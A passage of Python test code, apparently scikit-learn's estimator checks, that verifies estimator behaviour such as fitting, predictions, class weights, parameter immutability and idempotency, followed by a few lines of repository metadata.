    X, y = _regression_dataset()

    estimator = clone(estimator_orig)
    for method in ('decision_function', 'predict', 'predict_proba',
                   'predict_log_proba'):
        if hasattr(estimator, method):
            assert_raises(NotFittedError, getattr(estimator, method), X)


@ignore_warnings(category=FutureWarning)
def check_supervised_y_2d(name, estimator_orig, strict_mode=True):
    # Fitting with a column-vector y must warn (DataConversionWarning)
    # and produce the same predictions as the 1d y.
    tags = estimator_orig._get_tags()
    if tags['multioutput_only']:
        # These only work on 2d, so this test makes no sense
        return
    rnd = np.random.RandomState(0)
    n_samples = 30
    X = _pairwise_estimator_convert_X(
        rnd.uniform(size=(n_samples, 3)), estimator_orig
    )
    y = np.arange(n_samples) % 3
    y = _enforce_estimator_tags_y(estimator_orig, y)
    estimator = clone(estimator_orig)
    set_random_state(estimator)
    # fit
    estimator.fit(X, y)
    y_pred = estimator.predict(X)

    set_random_state(estimator)
    # Check that when a 2D y is given, a DataConversionWarning is
    # raised
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always", DataConversionWarning)
        warnings.simplefilter("ignore", RuntimeWarning)
        estimator.fit(X, y[:, np.newaxis])
    y_pred_2d = estimator.predict(X)
    msg = "expected 1 DataConversionWarning, got: %s" % (
        ", ".join([str(w_x) for w_x in w]))
    if not tags['multioutput']:
        # check that we warned if we don't support multi-output
        assert len(w) > 0, msg
        assert "DataConversionWarning('A column-vector y" \
               " was passed when a 1d array was expected" in msg
        assert_allclose(y_pred.ravel(), y_pred_2d.ravel())


@ignore_warnings
def check_classifiers_predictions(X, y, name, classifier_orig,
                                  strict_mode=True):
    # Check that predict agrees with decision_function and that classes_
    # reflects the labels seen in y; used by check_classifiers_classes.
    classes = np.unique(y)
    classifier = clone(classifier_orig)
    if name == 'BernoulliNB':
        X = X > X.mean()
    set_random_state(classifier)

    classifier.fit(X, y)
    y_pred = classifier.predict(X)

    if hasattr(classifier, "decision_function"):
        decision = classifier.decision_function(X)
        assert isinstance(decision, np.ndarray)
        if len(classes) == 2:
            dec_pred = (decision.ravel() > 0).astype(int)
            dec_exp = classifier.classes_[dec_pred]
            assert_array_equal(dec_exp, y_pred,
                               err_msg="decision_function does not match "
                               "classifier for %r: expected '%s', got '%s'" %
                               (classifier, ", ".join(map(str, dec_exp)),
                                ", ".join(map(str, y_pred))))
        elif getattr(classifier, 'decision_function_shape', 'ovr') == 'ovr':
            decision_y = np.argmax(decision, axis=1).astype(int)
            y_exp = classifier.classes_[decision_y]
            assert_array_equal(y_exp, y_pred,
                               err_msg="decision_function does not match "
                               "classifier for %r: expected '%s', got '%s'" %
                               (classifier, ", ".join(map(str, y_exp)),
                                ", ".join(map(str, y_pred))))

    # training set performance
    if name != "ComplementNB":
        # This is a pathological data set for ComplementNB.
# For some specific cases 'ComplementNB' predicts less classes # than expected assert_array_equal(np.unique(y), np.unique(y_pred)) assert_array_equal(classes, classifier.classes_, err_msg="Unexpected classes_ attribute for %r: " "expected '%s', got '%s'" % (classifier, ", ".join(map(str, classes)), ", ".join(map(str, classifier.classes_)))) def _choose_check_classifiers_labels(name, y, y_names): return y if name in ["LabelPropagation", "LabelSpreading"] else y_names def check_classifiers_classes(name, classifier_orig, strict_mode=True): X_multiclass, y_multiclass = make_blobs(n_samples=30, random_state=0, cluster_std=0.1) X_multiclass, y_multiclass = shuffle(X_multiclass, y_multiclass, random_state=7) X_multiclass = StandardScaler().fit_transform(X_multiclass) # We need to make sure that we have non negative data, for things # like NMF X_multiclass -= X_multiclass.min() - .1 X_binary = X_multiclass[y_multiclass != 2] y_binary = y_multiclass[y_multiclass != 2] X_multiclass = _pairwise_estimator_convert_X(X_multiclass, classifier_orig) X_binary = _pairwise_estimator_convert_X(X_binary, classifier_orig) labels_multiclass = ["one", "two", "three"] labels_binary = ["one", "two"] y_names_multiclass = np.take(labels_multiclass, y_multiclass) y_names_binary = np.take(labels_binary, y_binary) problems = [(X_binary, y_binary, y_names_binary)] if not classifier_orig._get_tags()['binary_only']: problems.append((X_multiclass, y_multiclass, y_names_multiclass)) for X, y, y_names in problems: for y_names_i in [y_names, y_names.astype('O')]: y_ = _choose_check_classifiers_labels(name, y, y_names_i) check_classifiers_predictions(X, y_, name, classifier_orig) labels_binary = [-1, 1] y_names_binary = np.take(labels_binary, y_binary) y_binary = _choose_check_classifiers_labels(name, y_binary, y_names_binary) check_classifiers_predictions(X_binary, y_binary, name, classifier_orig) @ignore_warnings(category=FutureWarning) def check_regressors_int(name, regressor_orig, strict_mode=True): 
    # Fitting on integer y and on the same y cast to float must give
    # (almost) the same predictions.
    X, _ = _regression_dataset()
    X = _pairwise_estimator_convert_X(X[:50], regressor_orig)
    rnd = np.random.RandomState(0)
    y = rnd.randint(3, size=X.shape[0])
    y = _enforce_estimator_tags_y(regressor_orig, y)
    rnd = np.random.RandomState(0)
    # separate estimators to control random seeds
    regressor_1 = clone(regressor_orig)
    regressor_2 = clone(regressor_orig)
    set_random_state(regressor_1)
    set_random_state(regressor_2)

    if name in CROSS_DECOMPOSITION:
        y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
        y_ = y_.T
    else:
        y_ = y

    # fit
    regressor_1.fit(X, y_)
    pred1 = regressor_1.predict(X)
    regressor_2.fit(X, y_.astype(float))
    pred2 = regressor_2.predict(X)
    assert_allclose(pred1, pred2, atol=1e-2, err_msg=name)


@ignore_warnings(category=FutureWarning)
def check_regressors_train(name, regressor_orig, readonly_memmap=False,
                           X_dtype=np.float64, strict_mode=True):
    # Core regressor contract: input validation, fit/predict shapes, and
    # a minimum training-set R^2 score.
    X, y = _regression_dataset()
    X = X.astype(X_dtype)
    X = _pairwise_estimator_convert_X(X, regressor_orig)
    y = scale(y)  # X is already scaled
    regressor = clone(regressor_orig)
    y = _enforce_estimator_tags_y(regressor, y)
    if name in CROSS_DECOMPOSITION:
        rnd = np.random.RandomState(0)
        y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
        y_ = y_.T
    else:
        y_ = y

    if readonly_memmap:
        X, y, y_ = create_memmap_backed_data([X, y, y_])

    if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
        # linear regressors need to set alpha, but not generalized CV ones
        regressor.alpha = 0.01
    if name == 'PassiveAggressiveRegressor':
        regressor.C = 0.01

    # raises error on malformed input for fit
    with assert_raises(ValueError, msg="The classifier {} does not"
                       " raise an error when incorrect/malformed input "
                       "data for fit is passed. The number of training "
                       "examples is not the same as the number of "
                       "labels. Perhaps use check_X_y in fit.".format(name)):
        regressor.fit(X, y[:-1])
    # fit
    set_random_state(regressor)
    regressor.fit(X, y_)
    regressor.fit(X.tolist(), y_.tolist())
    y_pred = regressor.predict(X)
    assert y_pred.shape == y_.shape

    # TODO: find out why PLS and CCA fail. RANSAC is random
    # and furthermore assumes the presence of outliers, hence
    # skipped
    if not regressor._get_tags()["poor_score"]:
        assert regressor.score(X, y_) > 0.5


@ignore_warnings
def check_regressors_no_decision_function(name, regressor_orig,
                                          strict_mode=True):
    # checks whether regressors have decision_function or predict_proba
    rng = np.random.RandomState(0)
    regressor = clone(regressor_orig)

    X = rng.normal(size=(10, 4))
    X = _pairwise_estimator_convert_X(X, regressor_orig)
    y = _enforce_estimator_tags_y(regressor, X[:, 0])

    if hasattr(regressor, "n_components"):
        # FIXME CCA, PLS is not robust to rank 1 effects
        regressor.n_components = 1

    regressor.fit(X, y)
    funcs = ["decision_function", "predict_proba", "predict_log_proba"]
    for func_name in funcs:
        func = getattr(regressor, func_name, None)
        if func is None:
            # doesn't have function
            continue
        # has function. Should raise deprecation warning
        msg = func_name
        assert_warns_message(FutureWarning, msg, func, X)


@ignore_warnings(category=FutureWarning)
def check_class_weight_classifiers(name, classifier_orig, strict_mode=True):
    # With an extreme class_weight favouring class 0, the classifier should
    # predict class 0 for the vast majority of a very noisy test set.
    if classifier_orig._get_tags()['binary_only']:
        problems = [2]
    else:
        problems = [2, 3]

    for n_centers in problems:
        # create a very noisy dataset
        X, y = make_blobs(centers=n_centers, random_state=0, cluster_std=20)
        X_train, X_test, y_train, y_test = train_test_split(X, y,
                                                            test_size=.5,
                                                            random_state=0)

        # can't use gram_if_pairwise() here, setting up gram matrix manually
        if _is_pairwise(classifier_orig):
            X_test = rbf_kernel(X_test, X_train)
            X_train = rbf_kernel(X_train, X_train)

        n_centers = len(np.unique(y_train))

        if n_centers == 2:
            class_weight = {0: 1000, 1: 0.0001}
        else:
            class_weight = {0: 1000, 1: 0.0001, 2: 0.0001}

        classifier = clone(classifier_orig).set_params(
            class_weight=class_weight)
        if hasattr(classifier, "n_iter"):
            classifier.set_params(n_iter=100)
        if hasattr(classifier, "max_iter"):
            classifier.set_params(max_iter=1000)
        if hasattr(classifier, "min_weight_fraction_leaf"):
            classifier.set_params(min_weight_fraction_leaf=0.01)
        if hasattr(classifier, "n_iter_no_change"):
            classifier.set_params(n_iter_no_change=20)

        set_random_state(classifier)
        classifier.fit(X_train, y_train)
        y_pred = classifier.predict(X_test)
        # XXX: Generally can use 0.89 here. On Windows, LinearSVC gets
        # 0.88 (Issue #9111)
        if not classifier_orig._get_tags()['poor_score']:
            assert np.mean(y_pred == 0) > 0.87


@ignore_warnings(category=FutureWarning)
def check_class_weight_balanced_classifiers(name, classifier_orig, X_train,
                                            y_train, X_test, y_test, weights,
                                            strict_mode=True):
    # NOTE(review): the `weights` parameter is unused in this body; it is
    # kept for call-site compatibility.
    classifier = clone(classifier_orig)
    if hasattr(classifier, "n_iter"):
        classifier.set_params(n_iter=100)
    if hasattr(classifier, "max_iter"):
        classifier.set_params(max_iter=1000)

    set_random_state(classifier)
    classifier.fit(X_train, y_train)
    y_pred = classifier.predict(X_test)

    classifier.set_params(class_weight='balanced')
    classifier.fit(X_train, y_train)
    y_pred_balanced = classifier.predict(X_test)
    assert (f1_score(y_test, y_pred_balanced, average='weighted') >
            f1_score(y_test, y_pred, average='weighted'))


@ignore_warnings(category=FutureWarning)
def check_class_weight_balanced_linear_classifier(name, Classifier,
                                                  strict_mode=True):
    """Test class weights with non-contiguous class labels."""
    # this is run on classes, not instances, though this should be changed
    X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
                  [1.0, 1.0], [1.0, 0.0]])
    y = np.array([1, 1, 1, -1, -1])

    classifier = Classifier()

    if hasattr(classifier, "n_iter"):
        # This is a very small dataset, default n_iter are likely to prevent
        # convergence
        classifier.set_params(n_iter=1000)
    if hasattr(classifier, "max_iter"):
        classifier.set_params(max_iter=1000)
    if hasattr(classifier, 'cv'):
        classifier.set_params(cv=3)
    set_random_state(classifier)

    # Let the model compute the class frequencies
    classifier.set_params(class_weight='balanced')
    coef_balanced = classifier.fit(X, y).coef_.copy()

    # Count each label occurrence to reweight manually
    n_samples = len(y)
    n_classes = float(len(np.unique(y)))

    class_weight = {1: n_samples / (np.sum(y == 1) * n_classes),
                    -1: n_samples / (np.sum(y == -1) * n_classes)}
    classifier.set_params(class_weight=class_weight)
    coef_manual = classifier.fit(X, y).coef_.copy()
    # 'balanced' must reproduce the manually computed inverse-frequency
    # weights
    assert_allclose(coef_balanced, coef_manual,
                    err_msg="Classifier %s is not computing"
                    " class_weight=balanced properly."
                    % name)


@ignore_warnings(category=FutureWarning)
def check_estimators_overwrite_params(name, estimator_orig, strict_mode=True):
    # fit must not modify any constructor parameter in place.
    X, y = make_blobs(random_state=0, n_samples=21)
    # some want non-negative input
    X -= X.min()
    X = _pairwise_estimator_convert_X(X, estimator_orig, kernel=rbf_kernel)
    estimator = clone(estimator_orig)
    y = _enforce_estimator_tags_y(estimator, y)

    set_random_state(estimator)

    # Make a physical copy of the original estimator parameters before fitting.
    params = estimator.get_params()
    original_params = deepcopy(params)

    # Fit the model
    estimator.fit(X, y)

    # Compare the state of the model parameters with the original parameters
    new_params = estimator.get_params()
    for param_name, original_value in original_params.items():
        new_value = new_params[param_name]

        # We should never change or mutate the internal state of input
        # parameters by default. To check this we use the joblib.hash function
        # that introspects recursively any subobjects to compute a checksum.
        # The only exception to this rule of immutable constructor parameters
        # is possible RandomState instance but in this check we explicitly
        # fixed the random_state params recursively to be integer seeds.
        assert joblib.hash(new_value) == joblib.hash(original_value), (
            "Estimator %s should not change or mutate "
            " the parameter %s from %s to %s during fit."
            % (name, param_name, original_value, new_value))


@ignore_warnings(category=FutureWarning)
def check_no_attributes_set_in_init(name, estimator_orig, strict_mode=True):
    """Check setting during init."""
    # __init__ must set exactly its parameters as attributes: nothing
    # extra, nothing missing.
    estimator = clone(estimator_orig)
    if hasattr(type(estimator).__init__, "deprecated_original"):
        return

    init_params = _get_args(type(estimator).__init__)
    if IS_PYPY:
        # __init__ signature has additional objects in PyPy
        for key in ['obj']:
            if key in init_params:
                init_params.remove(key)
    parents_init_params = [param for params_parent in
                           (_get_args(parent) for parent in
                            type(estimator).__mro__)
                           for param in params_parent]

    # Test for no setting apart from parameters during init
    invalid_attr = (set(vars(estimator)) - set(init_params)
                    - set(parents_init_params))
    assert not invalid_attr, (
            "Estimator %s should not set any attribute apart"
            " from parameters during init. Found attributes %s."
            % (name, sorted(invalid_attr)))

    # Ensure that each parameter is set in init
    invalid_attr = set(init_params) - set(vars(estimator)) - {"self"}
    assert not invalid_attr, (
            "Estimator %s should store all parameters"
            " as an attribute during init. Did not find "
            "attributes %s."
            % (name, sorted(invalid_attr)))


@ignore_warnings(category=FutureWarning)
def check_sparsify_coefficients(name, estimator_orig, strict_mode=True):
    # sparsify() must leave predictions unchanged, including after a
    # pickle round-trip of the sparse coef_.
    X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1],
                  [-1, -2], [2, 2], [-2, -2]])
    y = np.array([1, 1, 1, 2, 2, 2, 3, 3, 3])
    y = _enforce_estimator_tags_y(estimator_orig, y)
    est = clone(estimator_orig)

    est.fit(X, y)
    pred_orig = est.predict(X)

    # test sparsify with dense inputs
    est.sparsify()
    assert sparse.issparse(est.coef_)
    pred = est.predict(X)
    assert_array_equal(pred, pred_orig)

    # pickle and unpickle with sparse coef_
    est = pickle.loads(pickle.dumps(est))
    assert sparse.issparse(est.coef_)
    pred = est.predict(X)
    assert_array_equal(pred, pred_orig)


@ignore_warnings(category=FutureWarning)
def check_classifier_data_not_an_array(name, estimator_orig,
                                       strict_mode=True):
    # Classifier predictions must not depend on X/y being ndarrays.
    X = np.array([[3, 0], [0, 1], [0, 2], [1, 1], [1, 2], [2, 1],
                  [0, 3], [1, 0], [2, 0], [4, 4], [2, 3], [3, 2]])
    X = _pairwise_estimator_convert_X(X, estimator_orig)
    y = np.array([1, 1, 1, 2, 2, 2, 1, 1, 1, 2, 2, 2])
    y = _enforce_estimator_tags_y(estimator_orig, y)
    for obj_type in ["NotAnArray", "PandasDataframe"]:
        check_estimators_data_not_an_array(name, estimator_orig, X, y,
                                           obj_type)


@ignore_warnings(category=FutureWarning)
def check_regressor_data_not_an_array(name, estimator_orig, strict_mode=True):
    # Regressor predictions must not depend on X/y being ndarrays.
    X, y = _regression_dataset()
    X = _pairwise_estimator_convert_X(X, estimator_orig)
    y = _enforce_estimator_tags_y(estimator_orig, y)
    for obj_type in ["NotAnArray", "PandasDataframe"]:
        check_estimators_data_not_an_array(name, estimator_orig, X, y,
                                           obj_type)


@ignore_warnings(category=FutureWarning)
def check_estimators_data_not_an_array(name, estimator_orig, X, y, obj_type,
                                       strict_mode=True):
    # Fit two clones, one on array-like wrappers and one on the raw arrays,
    # and require (almost) identical predictions.
    if name in CROSS_DECOMPOSITION:
        raise SkipTest("Skipping check_estimators_data_not_an_array "
                       "for cross decomposition module as estimators "
                       "are not deterministic.")
    # separate estimators to control random seeds
    estimator_1 = clone(estimator_orig)
    estimator_2 = clone(estimator_orig)
    set_random_state(estimator_1)
    set_random_state(estimator_2)

    if obj_type not in ["NotAnArray", 'PandasDataframe']:
        raise ValueError("Data type {0} not supported".format(obj_type))

    if obj_type == "NotAnArray":
        y_ = _NotAnArray(np.asarray(y))
        X_ = _NotAnArray(np.asarray(X))
    else:
        # Here pandas objects (Series and DataFrame) are tested explicitly
        # because some estimators may handle them (especially their indexing)
        # specially.
        try:
            import pandas as pd
            y_ = np.asarray(y)
            if y_.ndim == 1:
                y_ = pd.Series(y_)
            else:
                y_ = pd.DataFrame(y_)
            X_ = pd.DataFrame(np.asarray(X))

        except ImportError:
            raise SkipTest("pandas is not installed: not checking estimators "
                           "for pandas objects.")

    # fit
    estimator_1.fit(X_, y_)
    pred1 = estimator_1.predict(X_)
    estimator_2.fit(X, y)
    pred2 = estimator_2.predict(X)
    assert_allclose(pred1, pred2, atol=1e-2, err_msg=name)


def check_parameters_default_constructible(name, Estimator, strict_mode=True):
    # test default-constructibility
    # get rid of deprecation warnings

    Estimator = Estimator.__class__

    with ignore_warnings(category=FutureWarning):
        estimator = _construct_instance(Estimator)
        # test cloning
        clone(estimator)
        # test __repr__
        repr(estimator)
        # test that set_params returns self
        assert estimator.set_params() is estimator

        # test if init does nothing but set parameters
        # this is important for grid_search etc.
        # We get the default parameters from init and then
        # compare these against the actual values of the attributes.

        # this comes from getattr. Gets rid of deprecation decorator.
        init = getattr(estimator.__init__, 'deprecated_original',
                       estimator.__init__)
        try:
            def param_filter(p):
                """Identify hyper parameters of an estimator."""
                return (p.name != 'self' and
                        p.kind != p.VAR_KEYWORD and
                        p.kind != p.VAR_POSITIONAL)

            init_params = [p for p in signature(init).parameters.values()
                           if param_filter(p)]

        except (TypeError, ValueError):
            # init is not a python function.
            # true for mixins
            return
        params = estimator.get_params()
        # they can need a non-default argument
        init_params = init_params[len(getattr(
            estimator, '_required_parameters', [])):]

        for init_param in init_params:
            assert init_param.default != init_param.empty, (
                "parameter %s for %s has no default value"
                % (init_param.name, type(estimator).__name__))
            # defaults must be immutable so that clone() can copy them safely
            allowed_types = {
                str,
                int,
                float,
                bool,
                tuple,
                type(None),
                type,
                types.FunctionType,
                joblib.Memory,
            }
            # Any numpy numeric such as np.int32.
            allowed_types.update(np.core.numerictypes.allTypes.values())
            assert type(init_param.default) in allowed_types, (
                f"Parameter '{init_param.name}' of estimator "
                f"'{Estimator.__name__}' is of type "
                f"{type(init_param.default).__name__} which is not "
                f"allowed. All init parameters have to be immutable to "
                f"make cloning possible. Therefore we restrict the set of "
                f"legal types to "
                f"{set(type.__name__ for type in allowed_types)}."
            )
            if init_param.name not in params.keys():
                # deprecated parameter, not in get_params
                assert init_param.default is None, (
                    f"Estimator parameter '{init_param.name}' of estimator "
                    f"'{Estimator.__name__}' is not returned by get_params. "
                    f"If it is deprecated, set its default value to None."
                )
                continue

            param_value = params[init_param.name]
            if isinstance(param_value, np.ndarray):
                assert_array_equal(param_value, init_param.default)
            else:
                failure_text = (
                    f"Parameter {init_param.name} was mutated on init. All "
                    f"parameters must be stored unchanged."
                )
                if is_scalar_nan(param_value):
                    # Allows to set default parameters to np.nan
                    assert param_value is init_param.default, failure_text
                else:
                    assert param_value == init_param.default, failure_text


def _enforce_estimator_tags_y(estimator, y):
    # Estimators with a `requires_positive_y` tag only accept strictly positive
    # data
    if estimator._get_tags()["requires_positive_y"]:
        # Create strictly positive y. The minimal increment above 0 is 1, as
        # y could be of integer dtype.
y += 1 + abs(y.min()) # Estimators with a `binary_only` tag only accept up to two unique y values if estimator._get_tags()["binary_only"] and y.size > 0: y = np.where(y == y.flat[0], y, y.flat[0] + 1) # Estimators in mono_output_task_error raise ValueError if y is of 1-D # Convert into a 2-D y for those estimators. if estimator._get_tags()["multioutput_only"]: return np.reshape(y, (-1, 1)) return y def _enforce_estimator_tags_x(estimator, X): # Estimators with a `_pairwise` tag only accept # X of shape (`n_samples`, `n_samples`) if hasattr(estimator, '_pairwise'): X = X.dot(X.T) # Estimators with `1darray` in `X_types` tag only accept # X of shape (`n_samples`,) if '1darray' in estimator._get_tags()['X_types']: X = X[:, 0] # Estimators with a `requires_positive_X` tag only accept # strictly positive data if estimator._get_tags()['requires_positive_X']: X -= X.min() return X @ignore_warnings(category=FutureWarning) def check_non_transformer_estimators_n_iter(name, estimator_orig, strict_mode=True): # Test that estimators that are not transformers with a parameter # max_iter, return the attribute of n_iter_ at least 1. # These models are dependent on external solvers like # libsvm and accessing the iter parameter is non-trivial. not_run_check_n_iter = ['Ridge', 'SVR', 'NuSVR', 'NuSVC', 'RidgeClassifier', 'SVC', 'RandomizedLasso', 'LogisticRegressionCV', 'LinearSVC', 'LogisticRegression'] # Tested in test_transformer_n_iter not_run_check_n_iter += CROSS_DECOMPOSITION if name in not_run_check_n_iter: return # LassoLars stops early for the default alpha=1.0 the iris dataset. if name == 'LassoLars': estimator = clone(estimator_orig).set_params(alpha=0.) 
else: estimator = clone(estimator_orig) if hasattr(estimator, 'max_iter'): iris = load_iris() X, y_ = iris.data, iris.target y_ = _enforce_estimator_tags_y(estimator, y_) set_random_state(estimator, 0) estimator.fit(X, y_) assert estimator.n_iter_ >= 1 @ignore_warnings(category=FutureWarning) def check_transformer_n_iter(name, estimator_orig, strict_mode=True): # Test that transformers with a parameter max_iter, return the # attribute of n_iter_ at least 1. estimator = clone(estimator_orig) if hasattr(estimator, "max_iter"): if name in CROSS_DECOMPOSITION: # Check using default data X = [[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [2., 5., 4.]] y_ = [[0.1, -0.2], [0.9, 1.1], [0.1, -0.5], [0.3, -0.2]] else: X, y_ = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) X -= X.min() - 0.1 set_random_state(estimator, 0) estimator.fit(X, y_) # These return a n_iter per component. if name in CROSS_DECOMPOSITION: for iter_ in estimator.n_iter_: assert iter_ >= 1 else: assert estimator.n_iter_ >= 1 @ignore_warnings(category=FutureWarning) def check_get_params_invariance(name, estimator_orig, strict_mode=True): # Checks if get_params(deep=False) is a subset of get_params(deep=True) e = clone(estimator_orig) shallow_params = e.get_params(deep=False) deep_params = e.get_params(deep=True) assert all(item in deep_params.items() for item in shallow_params.items()) @ignore_warnings(category=FutureWarning) def check_set_params(name, estimator_orig, strict_mode=True): # Check that get_params() returns the same thing # before and after set_params() with some fuzz estimator = clone(estimator_orig) orig_params = estimator.get_params(deep=False) msg = ("get_params result does not match what was passed to set_params") estimator.set_params(**orig_params) curr_params = estimator.get_params(deep=False) assert set(orig_params.keys()) == set(curr_params.keys()), msg for k, v in curr_params.items(): assert orig_params[k] is v, msg # some fuzz 
values test_values = [-np.inf, np.inf, None] test_params = deepcopy(orig_params) for param_name in orig_params.keys(): default_value = orig_params[param_name] for value in test_values: test_params[param_name] = value try: estimator.set_params(**test_params) except (TypeError, ValueError) as e: e_type = e.__class__.__name__ # Exception occurred, possibly parameter validation warnings.warn("{0} occurred during set_params of param {1} on " "{2}. It is recommended to delay parameter " "validation until fit.".format(e_type, param_name, name)) change_warning_msg = "Estimator's parameters changed after " \ "set_params raised {}".format(e_type) params_before_exception = curr_params curr_params = estimator.get_params(deep=False) try: assert (set(params_before_exception.keys()) == set(curr_params.keys())) for k, v in curr_params.items(): assert params_before_exception[k] is v except AssertionError: warnings.warn(change_warning_msg) else: curr_params = estimator.get_params(deep=False) assert (set(test_params.keys()) == set(curr_params.keys())), msg for k, v in curr_params.items(): assert test_params[k] is v, msg test_params[param_name] = default_value @ignore_warnings(category=FutureWarning) def check_classifiers_regression_target(name, estimator_orig, strict_mode=True): # Check if classifier throws an exception when fed regression targets X, y = _regression_dataset() X = X + 1 + abs(X.min(axis=0)) # be sure that X is non-negative e = clone(estimator_orig) msg = 'Unknown label type: ' if not e._get_tags()["no_validation"]: assert_raises_regex(ValueError, msg, e.fit, X, y) @ignore_warnings(category=FutureWarning) def check_decision_proba_consistency(name, estimator_orig, strict_mode=True): # Check whether an estimator having both decision_function and # predict_proba methods has outputs with perfect rank correlation. 
centers = [(2, 2), (4, 4)] X, y = make_blobs(n_samples=100, random_state=0, n_features=4, centers=centers, cluster_std=1.0, shuffle=True) X_test = np.random.randn(20, 2) + 4 estimator = clone(estimator_orig) if (hasattr(estimator, "decision_function") and hasattr(estimator, "predict_proba")): estimator.fit(X, y) # Since the link function from decision_function() to predict_proba() # is sometimes not precise enough (typically expit), we round to the # 10th decimal to avoid numerical issues. a = estimator.predict_proba(X_test)[:, 1].round(decimals=10) b = estimator.decision_function(X_test).round(decimals=10) assert_array_equal(rankdata(a), rankdata(b)) def check_outliers_fit_predict(name, estimator_orig, strict_mode=True): # Check fit_predict for outlier detectors. n_samples = 300 X, _ = make_blobs(n_samples=n_samples, random_state=0) X = shuffle(X, random_state=7) n_samples, n_features = X.shape estimator = clone(estimator_orig) set_random_state(estimator) y_pred = estimator.fit_predict(X) assert y_pred.shape == (n_samples,) assert y_pred.dtype.kind == 'i' assert_array_equal(np.unique(y_pred), np.array([-1, 1])) # check fit_predict = fit.predict when the estimator has both a predict and # a fit_predict method. recall that it is already assumed here that the # estimator has a fit_predict method if hasattr(estimator, 'predict'): y_pred_2 = estimator.fit(X).predict(X) assert_array_equal(y_pred, y_pred_2) if hasattr(estimator, "contamination"): # proportion of outliers equal to contamination parameter when not # set to 'auto' expected_outliers = 30 contamination = float(expected_outliers)/n_samples estimator.set_params(contamination=contamination) y_pred = estimator.fit_predict(X) num_outliers = np.sum(y_pred != 1) # num_outliers should be equal to expected_outliers unless # there are ties in the decision_function values. 
this can # only be tested for estimators with a decision_function # method if (num_outliers != expected_outliers and hasattr(estimator, 'decision_function')): decision = estimator.decision_function(X) check_outlier_corruption(num_outliers, expected_outliers, decision) # raises error when contamination is a scalar and not in [0,1] for contamination in [-0.5, 2.3]: estimator.set_params(contamination=contamination) assert_raises(ValueError, estimator.fit_predict, X) def check_fit_non_negative(name, estimator_orig, strict_mode=True): # Check that proper warning is raised for non-negative X # when tag requires_positive_X is present X = np.array([[-1., 1], [-1., 1]]) y = np.array([1, 2]) estimator = clone(estimator_orig) if strict_mode: assert_raises_regex(ValueError, "Negative values in data passed to", estimator.fit, X, y) else: # Don't check error message if strict mode is off assert_raises(ValueError, estimator.fit, X, y) def check_fit_idempotent(name, estimator_orig, strict_mode=True): # Check that est.fit(X) is the same as est.fit(X).fit(X). Ideally we would # check that the estimated parameters during training (e.g. coefs_) are # the same, but having a universal comparison function for those # attributes is difficult and full of edge cases. So instead we check that # predict(), predict_proba(), decision_function() and transform() return # the same results. 
check_methods = ["predict", "transform", "decision_function", "predict_proba"] rng = np.random.RandomState(0) estimator = clone(estimator_orig) set_random_state(estimator) if 'warm_start' in estimator.get_params().keys(): estimator.set_params(warm_start=False) n_samples = 100 X = rng.normal(loc=100, size=(n_samples, 2)) X = _pairwise_estimator_convert_X(X, estimator) if is_regressor(estimator_orig): y = rng.normal(size=n_samples) else: y = rng.randint(low=0, high=2, size=n_samples) y = _enforce_estimator_tags_y(estimator, y) train, test = next(ShuffleSplit(test_size=.2, random_state=rng).split(X)) X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) # Fit for the first time estimator.fit(X_train, y_train) result = {method: getattr(estimator, method)(X_test) for method in check_methods if hasattr(estimator, method)} # Fit again set_random_state(estimator) estimator.fit(X_train, y_train) for method in check_methods: if hasattr(estimator, method): new_result = getattr(estimator, method)(X_test) if np.issubdtype(new_result.dtype, np.floating): tol = 2*np.finfo(new_result.dtype).eps else: tol = 2*np.finfo(np.float64).eps assert_allclose_dense_sparse( result[method], new_result, atol=max(tol, 1e-9), rtol=max(tol, 1e-7), err_msg="Idempotency check failed for method {}".format(method) ) def check_n_features_in(name, estimator_orig, strict_mode=True): # Make sure that n_features_in_ attribute doesn't exist until fit is # called, and that its value is correct. 
rng = np.random.RandomState(0) estimator = clone(estimator_orig) set_random_state(estimator) if 'warm_start' in estimator.get_params(): estimator.set_params(warm_start=False) n_samples = 100 X = rng.normal(loc=100, size=(n_samples, 2)) X = _pairwise_estimator_convert_X(X, estimator) if is_regressor(estimator_orig): y = rng.normal(size=n_samples) else: y = rng.randint(low=0, high=2, size=n_samples) y = _enforce_estimator_tags_y(estimator, y) assert not hasattr(estimator, 'n_features_in_') estimator.fit(X, y) if hasattr(estimator, 'n_features_in_'): assert estimator.n_features_in_ == X.shape[1] else: warnings.warn( "As of scikit-learn 0.23, estimators should expose a " "n_features_in_ attribute, unless the 'no_validation' tag is " "True. This attribute should be equal to the number of features " "passed to the fit method. " "An error will be raised from version 0.25 when calling " "check_estimator(). " "See SLEP010: " "https://scikit-learn-enhancement-proposals.readthedocs.io/en/latest/slep010/proposal.html", # noqa FutureWarning ) def check_requires_y_none(name, estimator_orig, strict_mode=True): # Make sure that an estimator with requires_y=True fails gracefully when # given y=None rng = np.random.RandomState(0) estimator = clone(estimator_orig) set_random_state(estimator) n_samples = 100 X = rng.normal(loc=100, size=(n_samples, 2)) X = _pairwise_estimator_convert_X(X, estimator) warning_msg = ("As of scikit-learn 0.23, estimators should have a " "'requires_y' tag set to the appropriate value. " "The default value of the tag is False. 
" "An error will be raised from version 0.25 when calling " "check_estimator() if the tag isn't properly set.") expected_err_msgs = ( "requires y to be passed, but the target y is None", "Expected array-like (array or non-string sequence), got None", "y should be a 1d array" ) try: estimator.fit(X, None) except ValueError as ve: if not any(msg in str(ve) for msg in expected_err_msgs): warnings.warn(warning_msg, FutureWarning) # set of checks that are completely strict, i.e. they have no non-strict part _FULLY_STRICT_CHECKS = set([ 'check_n_features_in', ])
38.665393
112
0.635935
795a8af0b6904153a9b4e1a41d7b803381874162
8,792
py
Python
mmpose/models/necks/fpn.py
pallgeuer/mmpose
d3c17d5e6bdb9dbaca19f3bf53aa2802105355fd
[ "Apache-2.0" ]
null
null
null
mmpose/models/necks/fpn.py
pallgeuer/mmpose
d3c17d5e6bdb9dbaca19f3bf53aa2802105355fd
[ "Apache-2.0" ]
null
